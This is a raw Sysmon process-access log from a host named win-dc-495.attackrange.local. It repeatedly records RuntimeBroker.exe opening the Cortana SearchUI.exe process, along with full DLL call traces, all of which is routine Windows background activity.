13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405456C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405456C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405352C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405352C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405276C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405984C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405984C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
